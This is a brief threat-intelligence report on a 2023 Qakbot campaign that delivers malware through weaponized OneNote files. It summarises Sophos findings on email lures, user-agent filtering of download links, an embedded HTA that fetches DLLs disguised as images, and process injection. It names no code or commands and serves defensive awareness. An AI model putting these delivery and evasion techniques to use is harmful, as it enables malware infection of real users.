QakBot Pairs with OneNote

New Qakbot/Qbot campaigns have been discovered abusing the OneNote application to initiate its infection chain. Researchers from Sophos discovered the new trend on January 31st, 2023, from spam emails distributing Qakbot. The weaponized OneNote application can be delivered either as an attachment to the email or downloaded through a link. The message within the email appears plain and innocuous, with only one-liners luring the recipient to click the link or open the attachment, whilst labeling the matter as urgent. Interestingly, analysis from Sophos reveals the download link only targets Windows hosts by conducting a check on the host's user-agent string, "only browsers that transmit a Windows-computer’s User-Agent string in the query get the weaponized .one Notebook. All other User-Agent strings receive a 404 from the server hosting the malicious .one file."

The weaponized OneNote document is designed with a static image guiding the user to click an "Open" button to trigger an embedded, hta file retrieving Qakbot DLLs from a remote server and executing it with rundll32. The DLL files downloaded attempt to disguise themselves as image files using file extensions .jpeg and .png. Once executed Qakbot injects itself into a running process, Sophos observed in their test machines Qakbot injecting itself into the Windows Assistive Technology manager, AtBroker.exe.